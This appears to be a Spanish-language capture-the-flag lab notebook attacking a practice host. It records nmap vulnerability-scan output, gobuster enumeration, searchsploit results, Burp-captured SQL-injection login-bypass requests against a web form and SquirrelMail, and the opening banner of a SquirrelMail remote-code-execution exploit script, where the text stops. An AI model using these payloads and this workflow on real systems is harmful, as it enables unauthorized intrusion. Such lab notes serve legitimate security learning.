| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-8740 5.0 https://vulners.com/cve/CVE-2016-8740
| CVE-2016-4979 5.0 https://vulners.com/cve/CVE-2016-4979
| CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001
| CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320
| CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT*
| 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT*
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| OSV:BIT-APACHE-2020-11993 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
| OSV:BIT-APACHE-2020-11985 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11985
| FF610CB4-801A-5D1D-9AC9-ADFC287C8482 4.3 https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482 *EXPLOIT*
| FDF4BBB1-979C-5320-95EA-9EC7EB064D72 4.3 https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72 *EXPLOIT*
| FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 4.3 https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 *EXPLOIT*
| EDB-ID:50383 4.3 https://vulners.com/exploitdb/EDB-ID:50383 *EXPLOIT*
| E7B177F6-FA62-52FE-A108-4B8FC8112B7F 4.3 https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F *EXPLOIT*
| E6B39247-8016-5007-B505-699F05FCA1B5 4.3 https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5 *EXPLOIT*
| DBF996C3-DC2A-5859-B767-6B2FC38F2185 4.3 https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185 *EXPLOIT*
| D0E79214-C9E8-52BD-BC24-093970F5F34E 4.3 https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E *EXPLOIT*
| CVE-2020-11985 4.3 https://vulners.com/cve/CVE-2020-11985
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302
| CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2016-1546 4.3 https://vulners.com/cve/CVE-2016-1546
| CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE 4.3 https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE *EXPLOIT*
| CD48BD40-E52A-5A8B-AE27-B57C358BB0EE 4.3 https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE *EXPLOIT*
| C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 4.3 https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 *EXPLOIT*
| C8799CA3-C88C-5B39-B291-2895BE0D9133 4.3 https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133 *EXPLOIT*
| C0380E16-C468-5540-A427-7FE34E7CF36B 4.3 https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B *EXPLOIT*
| BC027F41-02AD-5D71-A452-4DD62B0F1EE1 4.3 https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1 *EXPLOIT*
| B946B2A1-2914-537A-BF26-94B48FC501B3 4.3 https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3 *EXPLOIT*
| B9151905-5395-5622-B789-E16B88F30C71 4.3 https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71 *EXPLOIT*
| B58E6202-6D04-5CB0-8529-59713C0E13B8 4.3 https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8 *EXPLOIT*
| B53D7077-1A2B-5640-9581-0196F6138301 4.3 https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301 *EXPLOIT*
| A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F 4.3 https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F *EXPLOIT*
| 9EE3F7E3-70E6-503E-9929-67FE3F3735A2 4.3 https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2 *EXPLOIT*
| 9D511461-7D24-5402-8E2A-58364D6E758F 4.3 https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F *EXPLOIT*
| 9CEA663C-6236-5F45-B207-A873B971F988 4.3 https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988 *EXPLOIT*
| 987C6FDB-3E70-5FF5-AB5B-D50065D27594 4.3 https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594 *EXPLOIT*
| 789B6112-E84C-566E-89A7-82CC108EFCD9 4.3 https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9 *EXPLOIT*
| 788F7DF8-01F3-5D13-9B3E-E4AA692153E6 4.3 https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6 *EXPLOIT*
| 749F952B-3ACF-56B2-809D-D66E756BE839 4.3 https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839 *EXPLOIT*
| 6E484197-456B-55DF-8D51-C2BB4925F45C 4.3 https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C *EXPLOIT*
| 68E78C64-D93A-5E8B-9DEA-4A8D826B474E 4.3 https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E *EXPLOIT*
| 6758CFA9-271A-5E99-A590-E51F4E0C5046 4.3 https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046 *EXPLOIT*
| 674BA200-C494-57E6-B1B4-1672DDA15D3C 4.3 https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C *EXPLOIT*
| 5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 4.3 https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 *EXPLOIT*
| 4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F 4.3 https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F *EXPLOIT*
| 4C79D8E5-D595-5460-AA84-18D4CB93E8FC 4.3 https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC *EXPLOIT*
| 4B44115D-85A3-5E62-B9A8-5F336C24673F 4.3 https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F *EXPLOIT*
| 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT*
| 3CF66144-235E-5F7A-B889-113C11ABF150 4.3 https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150 *EXPLOIT*
| 379FCF38-0B4A-52EC-BE3E-408A0467BF20 4.3 https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20 *EXPLOIT*
| 365CD0B0-D956-59D6-9500-965BF4017E2D 4.3 https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D *EXPLOIT*
| 2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F 4.3 https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F *EXPLOIT*
| 2B4FEB27-377B-557B-AE46-66D677D5DA1C 4.3 https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C *EXPLOIT*
| 1B75F2E2-5B30-58FA-98A4-501B91327D7F 4.3 https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F *EXPLOIT*
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 *EXPLOIT*
| 1145F3D1-0ECB-55AA-B25D-A26892116505 4.3 https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505 *EXPLOIT*
| 108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 4.3 https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 *EXPLOIT*
| 0BC014D0-F944-5E78-B5FA-146A8E5D0F8A 4.3 https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A *EXPLOIT*
| 06076ECD-3FB7-53EC-8572-ABBB20029812 4.3 https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812 *EXPLOIT*
| 05403438-4985-5E78-A702-784E03F724D4 4.3 https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4 *EXPLOIT*
| 00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 4.3 https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 *EXPLOIT*
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802
| OSV:BIT-APACHE-2020-13938 2.1 https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_ PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
| http-enum:
| /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
|_ /squirrelmail/images/sm_logo.png: SquirrelMail
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-37-190.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-37-190.eu-west-1.compute.internal:80/
| Form id:
|_ Form action: #
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:FE:2F:A7:DB:E9 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/3%OT=22%CT=1%CU=43544%PV=Y%DS=1%DC=D%G=Y%M=02FE2F%TM
OS:=65BD8F17%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%
OS:TS=8)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW
OS:7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68
OS:DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 344.52 seconds
------------------ BURPSUITE ----------------
REQUEST DEL BOTON SKYNET SEARCH:
POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 20
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close
submit=Skynet+Search
RESPONSE:
NO DEVUELVE NINGUN RESULTADO VISIBLE
REQUEST DEL BOTON iM FEELING LUCKY:
POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close
lucky=I%27m+Feeling+Lucky
RESPONSE:
TAMPOCO DEVUELVE NADA POR EL MMOMMENTO.
REQUEST PROBANDO INYECCION BASICA PARA TARATAR DE SALTAR UN LOGEO SUPONIENDO QUE TENGAN UN SUAR ADMINISTRATOR; POR QUE LLAMA LA ATENCION LA VARIABLE SUBMID QUE USA PARA CARGAR EL PRIMER BOTON EN LA REQUEST CAPTURADA:
POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close
submit=administrator' or 1=1 -- -
RESPONSE :
NO TUVIMOS RESULTADO FAVORABLE; NOS MUESTRA LA MISMA PAGINA
--------------------- GOBUSTER ---------------
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.37.190/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.37.190/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/02/03 01:12:21 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.37.190/admin/]
/config (Status: 301) [Size: 313] [--> http://10.10.37.190/config/]
/css (Status: 301) [Size: 310] [--> http://10.10.37.190/css/]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 309] [--> http://10.10.37.190/js/]
/server-status (Status: 403) [Size: 277]
/squirrelmail (Status: 301) [Size: 319] [--> http://10.10.37.190/squirrelmail/]
Progress: 4614 / 4615 (99.98%)===============================================================
2024/02/03 01:12:23 Finished
===============================================================
------------ ANALIZAMOS LAS RUTAS OBRTENISDAS CON NMAP SCRIPT VULN Y CON GOBUSTER: --------------
http://10.10.37.190/squirrelmail/src/login.php
VEMOS EN LA WEB UNA VERSION DE SERVICIO SQUIRRELMAIL 1.4.23 SVN:
SquirrelMail Logo
SquirrelMail version 1.4.23 [SVN]
By the SquirrelMail Project Team
SquirrelMail Login
Name:
Password:
----
http://10.10.37.190/admin/
POR WEB NOS RESPONDIO QUE NO TENEMOS PERMISOS:
Forbidden
You don't have permission to access this resource.
Apache/2.4.18 (Ubuntu) Server at 10.10.37.190 Port 80
----------------
http://10.10.37.190/config/
TAMPOCO TENEMOS PERMISOS:
Forbidden
You don't have permission to access this resource.
Apache/2.4.18 (Ubuntu) Server at 10.10.37.190 Port 80
---------------- BURPSUITE -------------
INTENTAMOS CAPATURARPARA VER LAS SOLICITUDES DEL LOGIN DEL SERVICIO SQUIRRELMAIL E INTENTAMOS CON REPITER HACER UNA INYECCION BASICA PARA SALTAR EL LOGIN COMO ADMIN; PERO NO FUNCIONO:
REQUEST:
POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.37.190
Content-Length: 97
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/squirrelmail/src/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: squirrelmail_language=en_US; SQMSESSID=8r65d5g44c98aastt1rt02nkr5
Connection: close
login_username=administrator%27+or+1%3D1+--+-&secretkey=&js_autodetect_results=1&just_logged_in=1
RESPONSE CREO VEMOS ALGUNAS PISTAS POR AQUI :
HTTP/1.1 200 OK
Date: Sat, 03 Feb 2024 01:26:35 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: squirrelmail_language=en_US; expires=Mon, 04-Mar-2024 01:26:35 GMT; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/src; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/src/; HttpOnly
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="x-dns-prefetch-control" content="off">
<script type="text/javascript" language="JavaScript">
<!--
if (self != top) { try { if (document.domain != top.document.domain) { throw "Clickjacking security violation! Please log out immediately!"; /* this code should never execute - exception should already have been thrown since it's a security violation in this case to even try to access top.document.domain (but it's left here just to be extra safe) */ } } catch (e) { self.location = "/squirrelmail/src/signout.php"; top.location = "/squirrelmail/src/signout.php" } }
// -->
</script>
<title>SquirrelMail - Unknown user or password incorrect.</title>
<!--[if IE 6]>
<style type="text/css">
/* avoid stupid IE6 bug with frames and scrollbars */
body {
width: expression(document.documentElement.clientWidth - 30);
}
</style>
<![endif]-->
</head>
<body text="#000000" bgcolor="#ffffff" link="#0000cc" vlink="#0000cc" alink="#0000cc">
<center><img src="../images/sm_logo.png" alt="SquirrelMail Logo" width="308" height="111" /><br />
<small>SquirrelMail version 1.4.23 [SVN]<br />By the SquirrelMail Project Team<br /></small>
<table cellspacing="1" cellpadding="0" bgcolor="#800000" width="70%"><tr><td><table width="100%" border="0" bgcolor="#ffffff" align="center"><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b>ERROR</b></font></td></tr><tr><td align="center">Unknown user or password incorrect.</td></tr><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b><a href="/squirrelmail/src/login.php" target="_top">Go to the login page</a></b></font></td></tr></table></td></tr></table></center></body></html>
LOS COMENTARIOS LLAMAN LA ATENSIONM POR AHORA YA LO VEREMOS:
/* este código nunca debería ejecutarse; ya debería haberse lanzado una excepción, ya que en este caso es una violación de seguridad incluso intentar acceder a top.document.domain (pero se deja aquí solo para mayor seguridad) */
<title>SquirrelMail: usuario desconocido o contraseña incorrecta.</title>
<!--[si IE 6]>
<tipo de estilo="texto/css">
/* evitar el estúpido error de IE6 con marcos y barras de desplazamiento */
cuerpo {
ancho: expresión (document.documentElement.clientWidth - 30);
}
</estilo>
<![endif]-->
/squirrelmail/src/signout.php
SquirrelMail versión 1.4.23 [SVN]<br />Por el equipo del proyecto SquirrelMail
PROBAMOS EJECUTAR TAMBIEN ESTA RUTA QUE NOS SALIO EN EL RESPONSE POR QUE COMO QUE DECIA QUE ESTABAMOS LOGUESDOS TAMBIEN; NO SE COMPRENDIA BIEN; PERO AL EJECUTAR ESTA RUTA NOS AVISO QUE CERRAMOS SESION CORRECTAMENTE; Y NOS SALIO UN BOTON DE VOLVER A INICIAL, CAPTURAMNOS ESTAS REQUEST PARA JUNTAR MAS INFO, PERO EN FIN NOS VOOLVIO AL LOGIN:
http://10.10.37.190/squirrelmail/src/signout.php
REQUEST.
GET /squirrelmail/src/login.php HTTP/1.1
Host: 10.10.37.190
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/squirrelmail/src/signout.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: squirrelmail_language=en_US; SQMSESSID=07qt4gq6rtjgqb5k8t4oqicgn3
Connection: close
-------------------- SEARCHSPLOIT -------------
┌──(root㉿kali)-[~]
└─# searchsploit SquirrelMail 1.4
----------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------- ---------------------------------
SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting | php/webapps/26305.txt
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion | php/webapps/27948.txt
SquirrelMail 1.4.x - Folder Name Cross-Site Scripting | php/webapps/24068.txt
SquirrelMail < 1.4.22 - Remote Code Execution | linux/remote/41910.sh
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite | php/webapps/43830.txt
SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite | php/webapps/43839.txt
----------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit -m linux/remote/41910.sh
Exploit: SquirrelMail < 1.4.22 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/41910
Path: /usr/share/exploitdb/exploits/linux/remote/41910.sh
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/41910.sh
┌──(root㉿kali)-[~]
└─# ls
41910.sh Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(root㉿kali)-[~]
└─# mv 41910.sh exploitpaimon.sh
┌──(root㉿kali)-[~]
└─# cat exploitpaimon.sh
#!/bin/bash
#
int='\033[94m
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)
SquirrelMail_RCE_exploit.sh (ver. 1.1)
Discovered and coded by
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
ExploitBox project:
https://ExploitBox.io
\033[0m'
# Quick and messy PoC for SquirrelMail webmail application.
# It contains payloads for 2 vectors:
# * File Write
# * RCE
# It requires user credentials and that SquirrelMail uses
# Sendmail method as email delivery transport
#
#
# Full advisory URL:
# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
# Exploit URL:
# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
#
# Tested on: # Ubuntu 16.04
# squirrelmail package version:
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
# Stay tuned for my new project - ExploitBox
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
